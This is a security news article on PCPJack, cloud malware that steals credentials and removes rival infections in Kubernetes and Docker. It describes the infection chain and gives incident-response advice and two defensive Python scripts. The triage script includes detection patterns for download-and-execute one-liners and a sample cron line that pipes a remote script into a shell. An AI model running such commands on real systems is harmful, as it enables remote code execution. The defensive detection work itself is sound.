PCPJack: The cloud malware that steals credentials at scale and erases rivals in Kubernetes and Docker

Published. 4 min read.

PCPJack is a new malware framework identified by SentinelLabs that combines cloud-worm techniques with a clear goal: stealing credentials at scale and making sure that any earlier operation on the same host, in particular the one attributed to TeamPCP, is wiped out. Its modus operandi is not just to take over access but to "claim" the victim by killing processes, services and containers and deleting the persistence artifacts of other actors, which complicates both detection and the initial attribution of the incident. Beyond the curiosity of rivalry between gangs, this behaviour raises the operational risk for organizations with exposed infrastructure.

Technically, PCPJack enters Linux systems through a bootstrap script (bootstrap.sh) that creates a hidden directory, installs Python dependencies, downloads additional modules and launches an orchestrator (monit.py). In the post-exploitation phase it collects SSH keys, tokens and configuration files (for example kubeconfigs and database credentials), enumerates and moves laterally across Kubernetes clusters and Docker daemons, and establishes persistence via systemd units, cron jobs, Redis configuration rewrites or privileged containers. Stolen credentials are exfiltrated to Telegram channels after being encrypted with X25519 ECDH and ChaCha20-Poly1305 and split into fragments that respect the platform's message-size limits, a design built for volume and resilience.


Documented entry vectors include exposed services such as Docker, Kubernetes, Redis, MongoDB and Ray, together with plugins and frameworks with published vulnerabilities (several recent CVEs in Next.js / React, WordPress and web panels). PCPJack also automates target discovery by harvesting hosts from datasets such as Common Crawl to widen its attack surface, which makes it a very efficient threat against misconfigured or unpatched infrastructure, with high impact potential in both development and production environments.

The link to TeamPCP drawn by SentinelLabs researchers suggests that PCPJack could be developed by an operator with previous experience in similar campaigns; attribution should nevertheless be treated with caution: tools and techniques circulate among criminals, and competing to "reclaim" compromised hosts is a known tactic for hiding real links. For the original technical analysis and the indicators published by the researchers, see the SentinelOne report: SentinelLabs - PCPJack.

If you suspect your organization may be affected, the immediate actions must be concrete and swift: isolate compromised hosts, preserve evidence (volumes, memory captures and logs), rotate and revoke exposed credentials and service tokens, inspect CloudTrail / Activity Logs to trace lateral movement and outbound connections, and plan the revocation and rotation of SSH and API keys. In AWS environments, enabling and requiring IMDSv2 for instance metadata removes one credential-theft vector and should go together with a review of roles and policies; the AWS documentation on IMDSv2 offers practical steps: AWS - Configuring Instance Metadata Service.
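One way to check the IMDSv2 point across an account, as an added example that is not part of the original article or of the SentinelLabs report: the script below reads the JSON that `aws ec2 describe-instances` prints, flags each instance that still answers IMDSv1 requests or whose PUT hop limit lets a container reach the metadata endpoint, and prints the remediation command. The instance IDs and metadata options in SAMPLE are constructed for the example.

```python
"""Audit EC2 metadata options for IMDSv2 enforcement (added example).

Parses the JSON that `aws ec2 describe-instances` prints and flags every
instance that still answers IMDSv1 requests (HttpTokens != "required") or
whose PUT response hop limit is high enough for a container to reach the
metadata endpoint, then emits the remediation command. The instance IDs and
option values in SAMPLE are constructed for this example.
"""
import json
import sys

# Constructed sample in the shape of `aws ec2 describe-instances` output.
SAMPLE = {
    "Reservations": [
        {"Instances": [
            {"InstanceId": "i-0aaa111", "MetadataOptions": {
                "State": "applied", "HttpTokens": "optional",
                "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
            {"InstanceId": "i-0bbb222", "MetadataOptions": {
                "State": "applied", "HttpTokens": "required",
                "HttpPutResponseHopLimit": 2, "HttpEndpoint": "enabled"}},
        ]},
        {"Instances": [
            {"InstanceId": "i-0ccc333", "MetadataOptions": {
                "State": "applied", "HttpTokens": "required",
                "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
            {"InstanceId": "i-0ddd444", "MetadataOptions": {
                "State": "applied", "HttpTokens": "optional",
                "HttpPutResponseHopLimit": 1, "HttpEndpoint": "disabled"}},
        ]},
    ]
}


def audit_imds(describe_output: dict, max_hop_limit: int = 1) -> dict:
    """Return {instance_id: [issue, ...]}; an empty list means compliant."""
    report = {}
    for reservation in describe_output.get("Reservations", []):
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            issues = []
            # A disabled endpoint leaves nothing for a credential stealer to read.
            if opts.get("HttpEndpoint") != "disabled":
                if opts.get("HttpTokens") != "required":
                    issues.append("IMDSv1 allowed (HttpTokens != required)")
                hops = opts.get("HttpPutResponseHopLimit", 1)
                if hops > max_hop_limit:
                    issues.append(f"hop limit {hops} lets containers reach IMDS")
            report[inst["InstanceId"]] = issues
    return report


def remediation_commands(report: dict) -> list:
    """One modify-instance-metadata-options call per non-compliant instance."""
    return [
        f"aws ec2 modify-instance-metadata-options --instance-id {iid} "
        "--http-tokens required --http-put-response-hop-limit 1"
        for iid, issues in report.items() if issues
    ]


if __name__ == "__main__":
    # Usage: aws ec2 describe-instances > instances.json; python audit.py instances.json
    data = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE
    result = audit_imds(data)
    for iid, issues in result.items():
        print(iid, "OK" if not issues else "; ".join(issues))
    for cmd in remediation_commands(result):
        print(cmd)
```

A hop limit of 1 stops containers on bridge or overlay networks from borrowing the node's instance role, which is exactly what a container-hopping stealer wants; before applying it to Kubernetes nodes, make sure workloads that rely on the node role have been moved to per-pod identities, or they will lose AWS access.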


For detection and sustained mitigation, enforce least-privilege access control, use secrets managers and short-lived credentials instead of configuration files with plaintext secrets, enable MFA on all privileged accounts and limit public exposure of the Docker and Kubernetes APIs (block public access to ports 2375 / 6443, require authentication and TLS). Continuous auditing, alerts on the creation of new systemd services or unusual cron entries, monitoring for Redis configuration rewrites, and searching for binaries or scripts named bootstrap.sh or monit.py are pragmatic measures for catching infections early.
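A host triage script for the persistence indicators listed above, added here as an example and not taken from the article or from the SentinelLabs report: it walks systemd unit directories, cron directories and the usual staging locations looking for units or cron jobs that reference bootstrap.sh / monit.py or launch Python from a hidden directory, cron lines that pipe a download into a shell, and hidden directories holding the stage scripts. The sample tree built by build_sample_root(), including its file names, paths and the 203.0.113.x address, is constructed for the example.

```python
"""Host triage for the persistence artifacts described above (added example).

Looks for what the article says PCPJack leaves behind: systemd units or cron
jobs that run bootstrap.sh / monit.py or launch Python from a hidden
directory, cron lines that pipe a download into a shell, and hidden
directories holding the stage scripts. Paths, file names and contents in
build_sample_root() are constructed for this example.
"""
from __future__ import annotations

import os
import re
import tempfile
from pathlib import Path

# File names the article associates with the bootstrap stage.
SUSPECT_NAMES = {"bootstrap.sh", "monit.py"}
# A path component that starts with a dot, e.g. "/root/.x/" or "/opt/.cache/".
HIDDEN_DIR = re.compile(r"/\.[^\s/.][^\s/]*/")
# curl/wget ... | sh or bash: download-and-execute one-liners.
PIPE_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")

SYSTEMD_DIRS = ("etc/systemd/system", "usr/lib/systemd/system")
CRON_DIRS = ("etc/cron.d", "var/spool/cron/crontabs", "var/spool/cron")
# Where to look for hidden staging directories (walking all of / is too slow).
WALK_DIRS = ("root", "home", "opt", "tmp", "var/tmp")


def classify(command: str) -> str | None:
    """Return a reason if a command line matches the article's indicators."""
    if any(name in command for name in SUSPECT_NAMES):
        return "references bootstrap.sh/monit.py"
    if PIPE_TO_SHELL.search(command):
        return "pipes a download into a shell"
    if "python" in command and HIDDEN_DIR.search(command):
        return "runs python from a hidden directory"
    return None


def scan_root(root: str) -> list[dict]:
    """Scan a filesystem root ("/" on a live host, or a mounted disk image)."""
    base = Path(root)
    findings: list[dict] = []
    # 1. systemd: only ExecStart lines carry the command.
    for rel in SYSTEMD_DIRS:
        d = base / rel
        if not d.is_dir():
            continue
        for unit in d.glob("*.service"):
            for line in unit.read_text(errors="ignore").splitlines():
                if line.startswith("ExecStart=") and (why := classify(line)):
                    findings.append({"kind": "systemd", "path": str(unit), "why": why})
    # 2. cron: every non-comment line is a schedule plus a command.
    for rel in CRON_DIRS:
        d = base / rel
        if not d.is_dir():
            continue
        for f in d.iterdir():
            if not f.is_file():
                continue
            for line in f.read_text(errors="ignore").splitlines():
                s = line.strip()
                if s and not s.startswith("#") and (why := classify(s)):
                    findings.append({"kind": "cron", "path": str(f), "why": why})
    # 3. hidden directories that hold the stage scripts themselves.
    for rel in WALK_DIRS:
        for dirpath, _dirs, files in os.walk(base / rel):
            if Path(dirpath).name.startswith(".") and SUSPECT_NAMES & set(files):
                findings.append({"kind": "file", "path": dirpath,
                                 "why": "hidden dir with bootstrap.sh/monit.py"})
    return findings


def build_sample_root() -> str:
    """Construct a small fake root in a temp dir (sample data, not real IoCs)."""
    root = tempfile.mkdtemp(prefix="pcpjack-triage-")
    sample = {
        "etc/systemd/system/monit.service":
            "[Unit]\nDescription=monitor\n[Service]\n"
            "ExecStart=/usr/bin/python3 /root/.x/monit.py\n"
            "[Install]\nWantedBy=multi-user.target\n",
        "etc/systemd/system/sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
        "etc/cron.d/update": "*/5 * * * * root curl -s http://203.0.113.5/x.sh | sh\n",
        "etc/cron.d/cache": "@reboot root /usr/bin/python3 /opt/.cache/run.py\n",
        "etc/cron.d/logrotate": "# daily\n0 0 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n",
        "root/.x/bootstrap.sh": "#!/bin/sh\n",
        "root/.x/monit.py": "# placeholder\n",
    }
    for rel, content in sample.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content)
    return root


if __name__ == "__main__":
    for hit in scan_root(build_sample_root()):
        print(f"[{hit['kind']}] {hit['path']}: {hit['why']}")
```

Run it as root against "/" or point it at a mounted forensic image; the file-name checks are the weakest part, since an operator can rename the scripts, so the hidden-directory and pipe-to-shell patterns are the ones worth wiring into a continuous alert alongside file-creation monitoring on the systemd and cron directories.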

The sophistication of PCPJack, namely strong encryption for exfiltration, automated exploitation of known CVEs and the use of mass target lists, underlines one reality: most of these attacks thrive on exposed configurations and missing patches. Organizations and software maintainers should prioritize fixes for critical web components and libraries, review CI / CD pipelines to avoid credential leaks, and strengthen container image governance. To better understand how attackers find targets on the public web, see Common Crawl's overview: Common Crawl.

Finally, do not underestimate the need for collaboration: share findings and IoCs with your response team, your cloud provider and the security community, and if the incident involves significant credential exposure or access to sensitive environments, bring in forensic specialists and consider the appropriate regulatory notification. The safest working assumption when tools such as PCPJack appear is compromise: act quickly to contain the loss of credentials and close re-entry vectors.
